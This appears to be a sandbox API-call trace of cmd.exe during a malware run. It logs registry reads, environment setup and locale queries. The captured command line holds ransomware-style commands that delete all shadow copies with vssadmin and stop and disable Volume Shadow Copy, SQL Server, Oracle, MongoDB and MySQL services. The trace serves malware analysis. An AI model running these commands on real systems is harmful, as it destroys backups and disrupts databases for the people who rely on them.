lpData=0x3ee6b8, lpcbData=0x3ee6b0*=0x1000 | out: lpType=0x3ee6b4*=0x0, lpData=0x3ee6b8*=0x0, lpcbData=0x3ee6b0*=0x1000) returned 0x2 [0038.990] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ee6b4, lpData=0x3ee6b8, lpcbData=0x3ee6b0*=0x1000 | out: lpType=0x3ee6b4*=0x4, lpData=0x3ee6b8*=0x1, lpcbData=0x3ee6b0*=0x4) returned 0x0 [0038.990] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ee6b4, lpData=0x3ee6b8, lpcbData=0x3ee6b0*=0x1000 | out: lpType=0x3ee6b4*=0x0, lpData=0x3ee6b8*=0x1, lpcbData=0x3ee6b0*=0x1000) returned 0x2 [0038.990] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ee6b4, lpData=0x3ee6b8, lpcbData=0x3ee6b0*=0x1000 | out: lpType=0x3ee6b4*=0x4, lpData=0x3ee6b8*=0x0, lpcbData=0x3ee6b0*=0x4) returned 0x0 [0038.990] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ee6b4, lpData=0x3ee6b8, lpcbData=0x3ee6b0*=0x1000 | out: lpType=0x3ee6b4*=0x4, lpData=0x3ee6b8*=0x40, lpcbData=0x3ee6b0*=0x4) returned 0x0 [0038.990] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ee6b4, lpData=0x3ee6b8, lpcbData=0x3ee6b0*=0x1000 | out: lpType=0x3ee6b4*=0x4, lpData=0x3ee6b8*=0x40, lpcbData=0x3ee6b0*=0x4) returned 0x0 [0038.990] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ee6b4, lpData=0x3ee6b8, lpcbData=0x3ee6b0*=0x1000 | out: lpType=0x3ee6b4*=0x0, lpData=0x3ee6b8*=0x40, lpcbData=0x3ee6b0*=0x1000) returned 0x2 [0038.990] RegCloseKey (hKey=0x68) returned 0x0 [0038.990] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ee6ac | out: phkResult=0x3ee6ac*=0x68) returned 0x0 [0038.990] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ee6b4, lpData=0x3ee6b8, lpcbData=0x3ee6b0*=0x1000 | out: lpType=0x3ee6b4*=0x0, lpData=0x3ee6b8*=0x40, lpcbData=0x3ee6b0*=0x1000) returned 0x2 [0038.990] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ee6b4, lpData=0x3ee6b8, lpcbData=0x3ee6b0*=0x1000 | out: lpType=0x3ee6b4*=0x4, lpData=0x3ee6b8*=0x1, lpcbData=0x3ee6b0*=0x4) returned 0x0 [0038.990] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ee6b4, lpData=0x3ee6b8, lpcbData=0x3ee6b0*=0x1000 | out: lpType=0x3ee6b4*=0x0, lpData=0x3ee6b8*=0x1, lpcbData=0x3ee6b0*=0x1000) returned 0x2 [0038.990] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ee6b4, lpData=0x3ee6b8, lpcbData=0x3ee6b0*=0x1000 | out: lpType=0x3ee6b4*=0x4, lpData=0x3ee6b8*=0x0, lpcbData=0x3ee6b0*=0x4) returned 0x0 [0038.990] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ee6b4, lpData=0x3ee6b8, lpcbData=0x3ee6b0*=0x1000 | out: lpType=0x3ee6b4*=0x4, lpData=0x3ee6b8*=0x9, lpcbData=0x3ee6b0*=0x4) returned 0x0 [0038.990] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ee6b4, lpData=0x3ee6b8, lpcbData=0x3ee6b0*=0x1000 | out: lpType=0x3ee6b4*=0x4, lpData=0x3ee6b8*=0x9, lpcbData=0x3ee6b0*=0x4) returned 0x0 [0038.991] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ee6b4, lpData=0x3ee6b8, lpcbData=0x3ee6b0*=0x1000 | out: lpType=0x3ee6b4*=0x0, lpData=0x3ee6b8*=0x9, lpcbData=0x3ee6b0*=0x1000) returned 0x2 [0038.991] RegCloseKey (hKey=0x68) returned 0x0 [0038.991] time (in: timer=0x0 | out: timer=0x0) returned 0x5d7ba075 [0038.991] srand (_Seed=0x5d7ba075) [0038.991] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c @echo off\r\nvssadmin delete shadows /all /quiet\r\nsc config browser\r\nsc config browser start=enabled\r\nsc stop vss\r\nsc config vss start=disabled\r\nsc stop MongoDB\r\nsc config MongoDB start=disabled\r\nsc stop SQLWriter\r\nsc config SQLWriter start=disabled\r\nsc stop MSSQLServerOLAPService\r\nsc config MSSQLServerOLAPService start=disabled\r\nsc stop MSSQLSERVER\r\nsc config MSSQLSERVER start=disabled\r\nsc stop MSSQL$SQLEXPRESS\r\nsc config MSSQL$SQLEXPRESS start=disabled\r\nsc stop ReportServer\r\nsc config ReportServer start=disabled\r\nsc stop OracleServiceORCL\r\nsc config OracleServiceORCL start=disabled\r\nsc stop OracleDBConsoleorcl\r\nsc config OracleDBConsoleorcl start=disabled\r\nsc stop OracleMTSRecoveryService\r\nsc config OracleMTSRecoveryService start=disabled\r\nsc stop OracleVssWriterORCL\r\nsc config OracleVssWriterORCL start=disabled\r\nsc stop MySQL\r\nsc config MySQL start=disabled\r\n" [0038.991] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c @echo off\r\nvssadmin delete shadows /all /quiet\r\nsc config browser\r\nsc config browser start=enabled\r\nsc stop vss\r\nsc config vss start=disabled\r\nsc stop MongoDB\r\nsc config MongoDB start=disabled\r\nsc stop SQLWriter\r\nsc config SQLWriter start=disabled\r\nsc stop MSSQLServerOLAPService\r\nsc config MSSQLServerOLAPService start=disabled\r\nsc stop MSSQLSERVER\r\nsc config MSSQLSERVER start=disabled\r\nsc stop MSSQL$SQLEXPRESS\r\nsc config MSSQL$SQLEXPRESS start=disabled\r\nsc stop ReportServer\r\nsc config ReportServer start=disabled\r\nsc stop OracleServiceORCL\r\nsc config OracleServiceORCL start=disabled\r\nsc stop OracleDBConsoleorcl\r\nsc config OracleDBConsoleorcl start=disabled\r\nsc stop OracleMTSRecoveryService\r\nsc config OracleMTSRecoveryService start=disabled\r\nsc stop OracleVssWriterORCL\r\nsc config OracleVssWriterORCL start=disabled\r\nsc stop MySQL\r\nsc config MySQL start=disabled\r\n" [0038.991] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a325260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0038.991] GetProcessHeap () returned 0x440000 [0038.991] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x210) returned 0x454ce8 [0038.992] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x454cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0038.992] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a330640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0038.992] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a330640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0038.992] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a330640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0038.992] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0038.992] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0038.992] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0038.992] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0038.992] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0038.992] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0038.992] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0038.992] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0038.992] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0038.993] GetProcessHeap () returned 0x440000 [0038.993] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x453738 | out: hHeap=0x440000) returned 1 [0038.993] GetEnvironmentStringsW () returned 0x452c60* [0038.993] GetProcessHeap () returned 0x440000 [0038.993] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xae2) returned 0x4559f0 [0038.993] FreeEnvironmentStringsW (penv=0x452c60) returned 1 [0038.993] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a330640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0038.993] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a330640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0038.993] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0038.993] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0038.993] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0038.993] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0038.993] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0038.993] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0038.993] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0038.993] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0038.993] GetProcessHeap () returned 0x440000 [0038.993] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x54) returned 0x4407f0 [0038.993] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ef478 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0038.993] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3ef478, lpFilePart=0x3ef474 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ef474*="Desktop") returned 0x25 [0038.993] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0038.993] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3ef1f4 | out: lpFindFileData=0x3ef1f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x452ae0 [0038.993] FindClose (in: hFindFile=0x452ae0 | out: hFindFile=0x452ae0) returned 1 [0038.994] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3ef1f4 | out: lpFindFileData=0x3ef1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x452ae0 [0038.994] FindClose (in: hFindFile=0x452ae0 | out: hFindFile=0x452ae0) returned 1 [0038.994] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0038.994] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3ef1f4 | out: lpFindFileData=0x3ef1f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x48f29da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x452ae0 [0038.994] FindClose (in: hFindFile=0x452ae0 | out: hFindFile=0x452ae0) returned 1 [0038.994] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0038.994] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0038.994] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0038.994] GetProcessHeap () returned 0x440000 [0038.994] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4559f0 | out: hHeap=0x440000) returned 1 [0038.994] GetEnvironmentStringsW () returned 0x454f00* [0038.994] GetProcessHeap () returned 0x440000 [0038.994] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb36) returned 0x455a40 [0038.994] FreeEnvironmentStringsW (penv=0x454f00) returned 1 [0038.994] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a325260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0038.994] GetProcessHeap () returned 0x440000 [0038.994] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4407f0 | out: hHeap=0x440000) returned 1 [0038.994] GetProcessHeap () returned 0x440000 [0038.995] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400e) returned 0x456580 [0038.995] GetProcessHeap () returned 0x440000 [0038.995] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x6de) returned 0x4537a0 [0038.995] GetProcessHeap () returned 0x440000 [0038.995] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456580 | out: hHeap=0x440000) returned 1 [0038.995] GetConsoleOutputCP () returned 0x1b5 [0038.995] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a324260 | out: lpCPInfo=0x4a324260) returned 1 [0038.995] GetUserDefaultLCID () returned 0x409 [0038.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a324950, cchData=8 | out: lpLCData=":") returned 2 [0038.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3ef5b8, cchData=128 | out: lpLCData="0") returned 2 [0038.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3ef5b8, cchData=128 | out: lpLCData="0") returned 2 [0038.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3ef5b8, cchData=128 | out: lpLCData="1") returned 2 [0038.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a324940, cchData=8 | out: lpLCData="/") returned 2 [0038.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a324d80, cchData=32 | out: lpLCData="Mon") returned 4 [0038.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a324d40, cchData=32 | out: lpLCData="Tue") returned 4 [0038.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a324d00, cchData=32 | out: lpLCData="Wed") returned 4 [0038.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a324cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0038.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a324c80, cchData=32 | out: lpLCData="Fri") returned 4 [0038.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a324c40, cchData=32 | out: lpLCData="Sat") returned 4 [0038.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a324c00, cchData=32 | out: lpLCData="Sun") returned 4 [0038.996] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a324930, cchData=8 | out: lpLCData=".") returned 2 [0038.996] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a324920, cchData=8 | out: lpLCData=",") returned 2 [0038.997] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0038.997] GetProcessHeap () returned 0x440000 [0038.998] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20c) returned 0x441050 [0038.998] GetConsoleTitleW (in: lpConsoleTitle=0x441050, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0038.998] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0038.998] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0038.998] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0038.998] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0038.999] GetProcessHeap () returned 0x440000 [0038.999] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400a) returned 0x456580 [0038.999] GetProcessHeap () returned 0x440000 [0038.999] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456580 | out: hHeap=0x440000) returned 1 [0038.999] GetProcessHeap () returned 0x440000 [0038.999] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x58) returned 0x441268 [0038.999] _wcsicmp (_String1="echo", _String2=")") returned 60 [0038.999] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0038.999] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0038.999] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0038.999] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0038.999] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0038.999] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0038.999] GetProcessHeap () returned 0x440000 [0038.999] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x58) returned 0x4407f0 [0039.000] GetProcessHeap () returned 0x440000 [0039.000] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x453e88 [0039.000] GetProcessHeap () returned 0x440000 [0039.000] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x453ea8 [0039.001] GetConsoleTitleW (in: lpConsoleTitle=0x3ef250, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0039.001] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0039.001] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0039.001] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0039.001] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0039.001] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0039.001] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0039.001] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0039.001] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0039.001] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0039.001] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0039.001] GetProcessHeap () returned 0x440000 [0039.001] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1c) returned 0x440890 [0039.002] GetProcessHeap () returned 0x440000 [0039.002] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x440890, Size=0x12) returned 0x453ec8 [0039.002] GetProcessHeap () returned 0x440000 [0039.002] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x453ec8) returned 0x12 [0039.002] GetProcessHeap () returned 0x440000 [0039.002] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1c) returned 0x440890 [0039.002] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0 [0039.002] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.002] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0039.002] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.002] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3241ac | out: lpMode=0x4a3241ac) returned 1 [0039.002] _get_osfhandle (_FileHandle=0) returned 0x3 [0039.002] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3241b0 | out: lpMode=0x4a3241b0) returned 1 [0039.002] SetConsoleInputExeNameW () returned 0x1 [0039.002] GetConsoleOutputCP () returned 0x1b5 [0039.002] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a324260 | out: lpCPInfo=0x4a324260) returned 1 [0039.002] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.003] exit (_Code=0)